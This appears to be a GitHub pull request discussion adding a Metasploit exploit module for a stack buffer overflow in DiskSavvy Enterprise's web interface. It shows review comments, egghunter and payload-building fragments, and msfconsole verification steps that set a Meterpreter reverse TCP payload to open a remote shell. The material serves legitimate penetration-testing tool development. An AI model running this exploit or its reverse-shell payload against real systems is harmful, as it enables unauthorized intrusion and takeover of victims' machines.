New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add module for DiskSavvy Enterprise (EDB-40854) #7848
Conversation
|
||
eggoptions = { | ||
checksum: true, | ||
eggtag: 'w00t' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I'm not familiar with the eggs, but should we do a random string here to find so its harder to detect exploitation?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
That's a great idea.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Though I recommend setting badchars when you do it:
Rex::Text.rand_text_alpha(4, payload_badchars)
sploit << make_nops(8) | ||
sploit << hunter | ||
sploit << rand_text_alpha(4500) | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
maybe a vprint_status('sending malicious request')
or something so the user knows the exploit fired? figured vprint so its not always there. It can be frustrating when you throw an exploit, and see no feedback on the screen if you dont get a shell.
docs look good to me |
9.3.14 is the most current version on the website. Unless your the edb author, was the company notified of the issue? Just want to get some back ground since there isn't a fixed version that I'm seeing. |
|
||
if res && res.code == 200 | ||
if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/ | ||
return Exploit::CheckCode::Vulnerable |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Should be Exploit::CheckCode::Appears
: https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check%28%29-method#check-codes
|
||
if res && res.code == 200 | ||
if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/ | ||
return Exploit::CheckCode::Vulnerable |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can we also throw in a vprint_status("Version Detected: #{version}")
in this and the elsif
.
If someone doesn't want to use auto target for some reason, this should tell them the version so they can set the target appropriately.
if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/ | ||
return Exploit::CheckCode::Vulnerable | ||
elsif res.body =~ /Disk Savvy Enterprise/ | ||
return Exploit::CheckCode::Detected |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
see above. In future versions of the software, id like to know what version is detected so i can go figure out the offset for myself. nice for debugging when things go awry
Worked for me.
I'll try another target once those changes get made but this is looking good so far! |
|
i'm getting no love on 9.3.14 on Xp sp3
service is crashing, but never a shell |
hmm, bind shell didn't work, reverse did.
Any ideas on why bind is working for 9.1.14 and not 9.3.14? wondering if its a space issue or not |
seems to be working now... i'll land this shortly! |
Release NotesAn exploit has been added for Disk Savvy Enterprise 9.1.14 and 9.3.14, a Windows based disk space analyzer with a web interface that has a stack based buffer ov |
@sgabe thanks for the submission, this looked pretty darn good from the beginning! |
|
||
eggoptions = { | ||
checksum: true, | ||
eggtag: rand_text_alpha(4, payload_badchars) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
For the future: since you're using Msf::Exploit#rand_text_alpha
and not Rex::Text::rand_text_alpha
, you don't need to specify payload_badchars
, since it's implied.
This is an MSF port of https://www.exploit-db.com/exploits/40854/. The module exploits a stack-based buffer overflow vulnerability in the web interface of DiskSavvy Enterprise version 9.1.14 and 9.3.14. The vulnerable application is available for download at http://www.disksavvy.com/downloads.html and https://www.exploit-db.com/apps/20058a6ebf1120bca9ac92b493cac1ff-disksavvyent_setup_v9.1.14.exe.
Verification
Disk Savvy Enterprise
serviceDisk Savvy Enterprise
client applicationTools
>Advanced Options
>Server
Enable Web Server On Port 80
to start the web interfacemsfconsole
use exploit/windows/http/disksavvy_get_bof
set rhost ip
check
set payload windows/meterpreter/reverse_tcp
set lhost ip
run
Test run results below for DiskSavvy Enterprise v9.1.14 on Windows XP SP3:
Test run results below for DiskSavvy Enterprise v9.3.14 on Windows 7 SP1: